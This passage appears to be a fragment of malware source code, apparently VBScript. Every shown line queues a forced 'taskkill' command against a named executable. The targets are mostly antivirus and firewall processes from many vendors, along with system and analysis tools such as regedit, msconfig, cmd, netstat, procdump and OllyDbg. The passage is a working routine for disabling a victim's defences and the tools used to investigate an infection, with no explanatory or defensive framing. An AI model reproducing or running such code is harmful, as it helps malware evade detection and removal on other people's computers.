    Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""backweb.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bargains.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bd_professional.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""beagle.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""belt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidef.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidserver.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcpevalsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bisp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""blss.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootconf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootwarn.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""borg2.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bpc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""brasil.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bs120.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bundle.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""bvt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccapp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccevtmgr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccpxysvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cdp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfgwiz.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""clean.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleanpc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""click.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmesys.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmgrdian.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmon016.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""connectionmonitor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpf9x206.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpfnt206.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ctrl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwnb181.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwntdwmo.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""datemanager.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dcomx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""defalert.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""defscangui.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""deputy.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""divx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllcache.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllreg.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""doors.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpfsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpps2.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwatson.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""drweb32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwebupw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dssagent.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""efpeadm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""emsw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ent.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanhnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanv95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ethereal.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""etrustcipe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""evpn.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""exantivirus-cnet.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""exe.avxw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""expert.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""explore.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fameh32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fast.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fch32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fih32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""firewall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fnrb32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win_trial.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsaa.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530stbyb.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530wtbyb.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsgk32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsm32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsma32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsmb32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""gator.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbmenu.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbpoll.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""generics.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""gmt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""guard.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""guarddog.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hacktracersetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbinst.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbsrv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotactio.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotpatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""htlog.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""htpatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hwpe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxdl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxiul.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamstats.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""idle.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedll.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedriver.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iexplorer.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ifw2000.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""inetlnfo.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""infus.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""infwin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""init.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""intdel.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""intren.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""istsvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""jammer.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""jdbgmrg.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavlite40eng.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpers40eng.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kazza.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""keenvalue.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-pf-213-en-win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrl-421-en-win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrp-421-en-win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kernel32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""killprocesssetup161.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""launcher.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldnetmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpro.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpromenu.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lnetinfo.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""loader.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""localnet.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lordpe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""luau.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lucomserver.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""luinit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""luspt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mapisvc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcagent.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcmnhdlr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcshield.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mctool.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsrte.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsshld.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""md.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfin32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfw2en.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfweng3.02d30.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrtcl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrte.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mghtml.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgui.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""minilog.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mmod.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""monitor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mostat.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfagent.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfservice.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mrflux.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msapp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msbb.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msblast.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscache.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msccn32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscman.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msconfig.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdos.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msiexec16.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msinfo32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mslaugh.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmgt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmsgri32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssmmc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssys.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msvxd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mu0311ad.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mwatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nav.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navap.navapsvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapsvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navdx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navstub.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nc2000.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ncinst4.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ndd32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""neomonitor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""neowatchlog.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netarmor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netd32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netinfo.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netscanpro.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netspyhunter-1.2.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netstat.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netutils.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nod32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""norton_internet_secu_3.0_407.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""notstart.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""npf40_tw_98_nt_me_2k.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""npfmessenger.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nprotect.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""npscheck.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""npssvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsched32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nssys32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nstask32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsupdate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntrtscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntvdm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntxconfig.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nui.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvarch16.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvsvc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwinst4.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwservice.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwtool16.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ollydbg.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""onsrvr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""optimize.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ostronet.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""otfix.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostinstall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostproinstall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""panixk.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""patch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavproxy.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcip10117_0.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pdsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""periscope.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""perswf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pf2.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pfwadmin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pgmonitr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pingscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""platin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pop3trap.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""poproxy.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""popscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""portdetective.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""portmonitor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""powerscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppinupdt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pptbc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppvstop.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""prizesurfer.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmvr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""procdump.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""processmonitor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""procexplorerv1.0.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""programauditor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""proport.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""protectx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pspf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""purge.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""qconsole.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""qserver.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rapapp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav8win32eng.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rb32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rcsync.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""realmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""reged.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedt32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rrguard.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rshell.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscn95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rulaunch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""run32dll.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll16.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ruxdll32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sahagent.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""save.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""savenow.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sbserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scam32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""setup_flowprotector_us.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""setupvameeval.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sfc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sgssfw32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sh.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""shellspyinstall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""shn.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""showbehind.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sms.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""smss32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""soap.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sofi.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sperm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""spf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoler.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolcv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolsv32.exe"""
